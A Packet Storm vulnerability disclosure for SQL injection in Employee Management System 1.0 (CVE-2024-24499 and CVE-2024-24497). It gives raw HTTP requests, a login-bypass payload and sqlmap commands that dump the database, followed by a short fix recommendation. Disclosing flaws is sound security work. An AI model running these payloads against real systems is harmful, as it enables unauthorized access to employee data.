what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Employee Management System 1.0 SQL Injection

Employee Management System 1.0 SQL Injection
Posted Apr 2, 2024
Authored by Yevhenii Butenko

Employee Management System version 1.0 suffers from additional remote SQL injection vulnerabilities. Original discovery of this finding is attributed to Ozlem Balci in January of 2024.

tags | exploit, remote, vulnerability, sql injection
advisories | CVE-2024-24499
SHA-256 | 0c0393923d3df1c0633d25e433d1f3d236c329b41f5056207cc820b47be87eae

Employee Management System 1.0 SQL Injection

Change Mirror Download
# Exploit Title: Employee Management System 1.0 - `txtfullname` and `txtphone` SQL Injection
# Date: 2 Feb 2024
# Exploit Author: Yevhenii Butenko
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2024-24499

### SQL Injection:

> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.

### Affected Components:

> /employee_akpoly/Admin/edit_profile.php

> Two parameters `txtfullname` and `txtphone` within admin edit profile mechanism are vulnerable to SQL Injection.


![txtfullname](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_edit_txtfullname_sqli.png?raw=true)

![txtphone](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_edit_txtphone_sqli.png?raw=true)

### Description:

> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.

## Proof of Concept:

### SQLMap

Save the following request to `edit_profile.txt`:

```
POST /employee_akpoly/Admin/edit_profile.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 88
Origin: http://localhost
Connection: close
Referer: http://localhost/employee_akpoly/Admin/edit_profile.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

txtfullname=Caroline+Bassey&txtphone=0905656&old_image=uploadImage%2Fbird.jpg&btnupdate=
```

Use `sqlmap` with `-r` option to exploit the vulnerability:

```
sqlmap -r edit_profile.txt --level 5 --risk 3 --batch --dbms MYSQL --dump
```


## Recommendations

When using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.



------------------------
# Exploit Title: Employee Management System 1.0 - `txtusername` and `txtpassword` SQL Injection (Admin Login)
# Date: 2 Feb 2024
# Exploit Author: Yevhenii Butenko
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/16999/employee-management-system.html
# Version: 1.0
# Tested on: Debian
# CVE : CVE-2024-24497

### SQL Injection:

> SQL injection is a type of security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. Usually, it involves the insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system, and in some cases, issue commands to the operating system.

### Affected Components:

> /employee_akpoly/Admin/login.php

> Two parameters `txtusername` and `txtpassword` within admin login mechanism are vulnerable to SQL Injection.

![txtusername](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_login_txtusername_sqli.png?raw=true)
![txtpassword](https://github.com/0xQRx/VunerabilityResearch/blob/master/2024/img/admin_login_txtpassword_sqli.png?raw=true)

### Description:

> The presence of SQL Injection in the application enables attackers to issue direct queries to the database through specially crafted requests.

## Proof of Concept:

### Manual Exploitation

The payload `' and 1=1-- -` can be used to bypass authentication within admin login page.

```
POST /employee_akpoly/Admin/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 61
Origin: http://localhost
Connection: close
Referer: http://localhost/employee_akpoly/Admin/login.php
Cookie: PHPSESSID=lcb84k6drd2tepn90ehe7p9n20
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

txtusername=admin' and 1=1-- -&txtpassword=password&btnlogin=
```

### SQLMap

Save the following request to `admin_login.txt`:

```
POST /employee_akpoly/Admin/login.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://localhost
Connection: close
Referer: http://localhost/employee_akpoly/Admin/login.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

txtusername=admin&txtpassword=password&btnlogin=
```

Use `sqlmap` with `-r` option to exploit the vulnerability:

```
sqlmap -r admin_login.txt --level 5 --risk 3 --batch --dbms MYSQL --dump
```

## Recommendations

When using this Employee Management System, it is essential to update the application code to ensure user input sanitization and proper restrictions for special characters.
Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    0 Files
  • 16
    Apr 16th
    0 Files
  • 17
    Apr 17th
    0 Files
  • 18
    Apr 18th
    0 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close